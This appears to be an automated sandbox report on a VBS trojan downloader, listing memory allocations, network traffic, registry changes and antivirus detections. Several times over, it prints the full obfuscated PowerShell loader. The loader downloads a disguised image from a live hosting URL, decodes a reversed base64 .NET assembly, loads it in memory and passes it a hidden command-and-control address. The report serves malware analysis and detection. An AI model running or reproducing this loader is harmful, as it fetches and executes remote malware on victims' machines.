NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02655000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02656000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02657000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02658000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b37000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b39000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b3f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b53000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Jan. 12, 2025, 2:32 p.m.	process_identifier: 2648 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b54000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

powershell.exe -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() | ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Jan. 12, 2025, 2:32 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() \| ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };" filepath: powershell.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 12, 2025, 2:32 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (15 events)

Data received	]
Data received	Y»<x¹v¢OÄ÷qã¼ÿ×mÂó:DOWNGRD ¬=#;¿¨Ðñì»íUwö·©¥YP;Wd¬g²{ÌÃxÀÿ
Data received	8
Data received	41Ó0Ï0· É2M¯ý1ø0 H÷ 0´10 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.1-0+U$http://certs.godaddy.com/repository/1301UGo Daddy Secure Certificate Authority - G20 241218123855Z 260114153644Z0W10 UIL10UPetah Tikva10U Cloudinary Ltd10U.cloudinary.com0"0 H÷ 0 ÿ\×ZÖwi<õeºBÄô§-s¡2·f¾¦»&§L°Rg!¨ËGÆÐª%t%Lµú3ë.½ZÎZÒ¤½8 7äGY4îÕó¦_¸Éfz,)VäõLéêÑaJJb.ò)í¨¡K,ð£UËïnÆ©"C¨8ì°`ôÈIk+mÙWFç´}!$oÒVí;séËÈû> £\|X¦uIô9Û þrRñ¶è02eÅ]ãõ¥¬+æ4¬kf´ª@w /ý¿hÃç/àÏãà£ÎÎ¯qÊurú5aÐy¡¹jÅ£?0;0Uÿ00U%0++0Uÿ 06U/0-0+ ) '%http://crl.godaddy.com/gdig2s2-41.crl0]U V0T0H`Hým0907++http://certificates.godaddy.com/repository/0g0v+j0h0$+0http://ocsp.godaddy.com/0@+04http://certificates.godaddy.com/repository/gdig2.crt0U#0@Â½'Ì40¢3×ûl³ð´,Î0+U$0".cloudinary.comcloudinary.com0U0¦oIT xV»Z5ÀWe0~ +ÖynjhvW¼ó®©>3,³÷ßÂ=q2%Ý!©%¬aÅN!ÙÇFG0E ~DXhêXPÀäT×èGIÑïëz7iõB¥pÚ/!Á2ìVÛÜ=d¦º¤ò²¢òzÏùî (µ;íÃFvdÄl¤ì§¢.¼«O(Ô5'«êþÕÉ}ÍðÙÇGµG0E ,C}ÏÈÕ ÜK@@J°ÔZ©äûjÕòîwsr< E¹!ËQ¾VµtíZ«ê¤Ï$,èÇð ñÿÐTÏ£ÑvË8÷\|¡D_[ÁÝûÉnòYÍG i°ËÃXçÙÇHºG0E mâ6×¡ÄÒORè5109ã!»çÈÉY`.!Ù½\ç·¶.÷Ad/Îø½ þÖg·ÂÝ0 H÷ OI´Hå)æ~8ÆîñKÿ¸ Ê+Ñ=²Tó¹ãµaÇùøZ FpdF× Á´Åu¤ #¥¶:{ðÅ¿»QÿÌ¦R'ÆFÕÍjn³×zl¼ãÆ'_@ÎmªÖ®x§Â2$ÎÄÀü§ÁP±ðÒô%áeÖ/£xc{±WyÿÞ ØêUö¥×~<UÔ¾nuÜê2§âR¯ÄNµy5ÇïBÔ¨[iöR>á`µ)Á®ð ß_wé_)hù{í¦!x &ÐîÎ§¬6eö¼zÓ³¥µÀ ãÄ y`Ûé.gp ðâOvÅAÔ0Ð0¸ 0 H÷ 010 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.110/U(Go Daddy Root Certificate Authority - G20 110503070000Z 310503070000Z0´10 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.1-0+U$http://certs.godaddy.com/repository/1301UGo Daddy Secure Certificate Authority - G20"0 H÷ 0 ¹àËÔ¯v½Ôbë0d¸lÃÙb/ÿ>eÏÎbæ<RÚEKU«xkcbÎilÈLÌE3êÜ£¯+þayWÄÏ.ô?0<]Gü¼Ã7AQKTø(¾Ð¾ð08ó°&øfGcmÞq&G8GSÑF´ãÜêE¬½¼qÙªoÛÛÍ0:yO_LGøï[ÂÄ`;±²CØ¤3Nê³Ö'O%¥ÆôÕÐ¦®tdWµDUÔ-:>ø¸½é2 dÄ:PñJ®çy3¯ èß9ÂilcRúwÁÈtÈ¹PT5KiN¼;ÓI.ÜÁÒRû£00Uÿ0ÿ0Uÿ0U@Â½'Ì40¢3×ûl³ð´,Î0U#0:g(¶ïö½An ÁÚÞ04+(0&0$+0http://ocsp.godaddy.com/05U.0,0* ( &$http://crl.godaddy.com/gdroot-g2.crl0FU ?0=0;U 0301+%https://certs.godaddy.com/repository/0 H÷ ~lÈ8¸©Kÿ¡_Oïl>ÉP¦s÷W1¾¼ä/ÛøºÓ[à´çæyb¢×jcs1µõ¨H¤;-¢]×´\|%OV0Ä¶D{,å^æïaª¿äî¸}ÁCÎD§p ôÈ`ÙØr¨s$µ¬"ÊbXD«%ÍÄbÛQ´ÓQô¼süvÎ6¤ÍÙØ,ê®õ²ÑMu?A#}[Kþ¤XF²Ã``ø}PAÎÂ¡Ã»ï/ÒTîDÙ ®§3í±-v6&Üë÷aÜoîF(¡&} §.£¼ø¼00}0e ç0 H÷ 0c10 UUS1!0U The Go Daddy Group, Inc.110/U(Go Daddy Class 2 Certification Authority0 140101070000Z 310530070000Z010 UUS10UArizona10U Scottsdale10U GoDaddy.com, Inc.110/U(Go Daddy Root Certificate Authority - G20"0 H÷ 0 ¿qbñúY4÷É£÷IXé"¦Å C;ñæI'êöN ´ÛpÇ2±>NîôúO/Y0"ç«Vkâüóu9Q{åù5¶tN©ä¶?©ú¢¾jÞÃ¶ÊêÃ¨;F\|2 óf"Èim6·Ó²`´8úÎÓÝFÞ >ë]\|È\|û°+S¤biQ%aD,©C#ß¬:)Å©é]¶0 9ÎñûK]Ì2ìbC%4V'´;p?n±è}ÔùÛSm`¿,çX«¸_FüÎÄ< ëI1\iF³àG£00Uÿ0ÿ0Uÿ0U:g(¶ïö½An ÁÚÞ0U#0ÒÄ°ÒÔLq³aË=¡þÝ¨jÔã04+(0&0$+0http://ocsp.godaddy.com/02U+0)0' % #!http://crl.godaddy.com/gdroot.crl0FU ?0=0;U 0301+%https://certs.godaddy.com/repository/0 H÷ YS½§${í[1ÏlpÅ¸n¾N»ö¾Pá0º(\bÂã~3÷ûBvÛ"Xu eg9 Å 8¤Å#?´¦Dã§i'´Z%:·2ÍÝÿ*8)3¤
Data received	Ýg²þ¡ PÈÜ*öB7LæßÕ¯$ò±ÃßÌµìà^·IT <ÇRI¤má³XÉØìÙ®2(p âþ¦½Wp³Zé S»ï\|ÿiàHÃ·È TÄ¬]g7lÊ¥/17ªno¼âW]$¯l¬7Lfóa ä¾0z¤) °á4_dw@Qß0¦¯
Data received	K
Data received	GAT éËýzÆù#2ºS³(âê÷¬'ïàßþØ'x¦7MMõ¢W¤lòÏì8êÅ«Ñ³E;~L ÒÁrMmþÛz{DÓÛt{#PÅ:!Dµá§¨à©66±{"Z¼QTEüObP>Èð:O;ò¯û÷79 ¦aw.§Iu iêÌê¾ªß5Æ£¤ãÌ0Åç6={º1×Côl½QÏDxMåÈ/tÅ Ã4<B£ò£BHPÊözõkV7Ci"NÍ¾Â±òÛz 3ÝáãSzËô¤´»t¶{m¬ÝïQa¦SË2±31!Ü6x}NQ¡5ßZr9y ØG9oáåFsàæá"ÔzQê*Dû¸©
Data received
Data received
Data received
Data received
Data received	0
Data received	M³{ +³WròG@¬&QÈÏZÍÊúD!ýçh(»@½Ò²÷,ä©jðyj¹
Data received	Ð
Data received	HVeÐ$\|¤ÒæO) ¡xNï±8èi×ÿ@q±gù~ãFäu «É^mJ]E\|¦¬ÈØ<Ô¾G½ÿjÃ©!®KV!CAl¬0Þ»ù(?feu q )ùñP>vÀ¸Û+ ³VìÌÔ±òî¤áíP=Ø=&4éE__Vë%t§äúO³{á·r 2¢öåÝé²þWX+ ~×¾ìyÍ9^³bìÓðªËíÉÔ(Áì<¤âéYÕ(øáì fÐ½~âÜ¢òdL[î^Ê»¡ð^Á]×zâ¶%à)ãA¢!3ËrW¨&\(g©4íÿ÷JÔ[ß¾{\|ê´¿}ÈèÆ.9"¡\ñ?Ð>o\OsCtÒÃØ[m¬ÿpg,´7W!þõN÷¡"·Ó''÷ DWÅc]ôc¥Å®Ýtã}ñX_1÷«TeìÁEþåº½Ï(¹<üFæÐuX¬P¼Òúë&Áôt$As¿áQ ¿8ÿ«~9ìÇ!Döµ-è·¹RÍ1-27Áà^hF)ñD AI?»× §î±Oâé=PlMâ#r¹ÃÛm}bÚMýG×Hóaö»ÝÏfÒß·û]½\Îcø:Tÿ>øÎò q¾j×ôS¥{V`ÊAãzÓòÕÉðûÄåÜËRÚ#×«Ï{)þ j9Foý¹mew,nø÷ÝBÖKhy¯ªmö\|3$ãIôÜ^\zøÙµâ{ cï(n©È¸©Úï°¸¦ÍuRã©Áe³ÛóÉËd}q?¤+¯sÕån$K52´ßÚã²Ïº~k"æw[ë¦ºßCò>ò

Poweshell is sending data to a remote host (3 events)

Data sent	uqgSåÅ:Cô12ï§{ÌjP?\|Pè./5 ÀÀÀ À 280ÿres.cloudinary.com
Data sent	FBAtyoaYeS+ T©)¦Vcáb}æ]9£ýCjÜèj&O8t{¨óÝÝTTÇ/z2+¼S0¾¥{ b3ÅcèÀ~4¦c¿-ó/}Nq="ú,<bçqoâ\|ÛM
Data sent	6ÇmÀJB ý¤Z©ì9kaªÄ:ÿà" ²^zèhp`«UÖ4\|T¸\ÞÃ$¼?û$y÷Þ«a÷AFzô&uë¢ëªÍ@¥Ê·§A t]W¹õBÂÐÆ- &¢©ß÷§U¿SÖ¢Ëß. ·'MµßÛw²Îê0FÞ¸tg epo+5K!¤Þ8LÌýÆ>u,

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Jan. 12, 2025, 2:32 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Jan. 12, 2025, 2:32 p.m.	buffer: uqgSåÅ:Cô12ï§{ÌjP?\|Pè./5 ÀÀÀ À 280ÿres.cloudinary.com socket: 1416 sent: 122	1	122
send Jan. 12, 2025, 2:32 p.m.	buffer: FBAtyoaYeS+ T©)¦Vcáb}æ]9£ýCjÜèj&O8t{¨óÝÝTTÇ/z2+¼S0¾¥{ b3ÅcèÀ~4¦c¿-ó/}Nq="ú,<bçqoâ\|ÛM socket: 1416 sent: 134	1	134
send Jan. 12, 2025, 2:32 p.m.	buffer: 6ÇmÀJB ý¤Z©ì9kaªÄ:ÿà" ²^zèhp`«UÖ4\|T¸\ÞÃ$¼?û$y÷Þ«a÷AFzô&uë¢ëªÍ@¥Ê·§A t]W¹õBÂÐÆ- &¢©ß÷§U¿SÖ¢Ëß. ·'MµßÛw²Îê0FÞ¸tg epo+5K!¤Þ8LÌýÆ>u, socket: 1416 sent: 165	1	165

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	powershell.exe -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() \| ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.GIBMMeof/5.13.271.701//:p##h';$restoredText = $originalText -replace '#', 't';$unshatterable = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$demayne = New-Object System.Net.WebClient;$altiplano = $demayne.DownloadData($unshatterable);$medine = [System.Text.Encoding]::UTF8.GetString($altiplano);$spiropentanes = '<<BASE64_START>>';$haemadrometer = '<<BASE64_END>>';$incented = $medine.IndexOf($spiropentanes);$brutality = $medine.IndexOf($haemadrometer);$incented -ge 0 -and $brutality -gt $incented;$incented += $spiropentanes.Length;$bavarette = $brutality - $incented;$candygrams = $medine.Substring($incented, $bavarette);$florent = -join ($candygrams.ToCharArray() \| ForEach-Object { $_ })[-1..-($candygrams.Length)];$caingy = [System.Convert]::FromBase64String($florent);$mindfuck = [System.Reflection.Assembly]::Load($caingy);$urbanity = [dnlib.IO.Home].GetMethod('VAI');$urbanity.Invoke($null, @($restoredText, 'Lappland', 'Lappland', 'Lappland', 'InstallUtil', 'Lappland', 'Lappland','Lappland','Lappland','Lappland','Lappland','Lappland','1','Lappland','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Lionic	Trojan.Script.Generic.4!c
CTX	vba.trojan.generic
Skyhigh	BehavesLike.VBS.Dropper.dp
VIPRE	Trojan.GenericKD.75319820
Arcabit	Trojan.Generic.D47D4A0C
ESET-NOD32	VBS/TrojanDownloader.Agent.ABLH
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	Trojan.GenericKD.75319820
MicroWorld-eScan	Trojan.GenericKD.75319820
Rising	Trojan.Undefined!8.1327C (TOPIS:E0:aV1J8kMRwPR)
Emsisoft	Trojan.GenericKD.75319820 (B)
Ikarus	Trojan-Downloader.VBS.Agent
FireEye	Trojan.GenericKD.75319820
Google	Detected
Antiy-AVL	Trojan/Script.Agent
Kingsoft	Script.Trojan.Generic.a
Microsoft	Trojan:Script/Sabsik.FL.A!ml
GData	Trojan.GenericKD.75319820
Tencent	Vbs.Trojan-Downloader.Der.Iflw
AVG	Script:SNH-gen [Trj]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

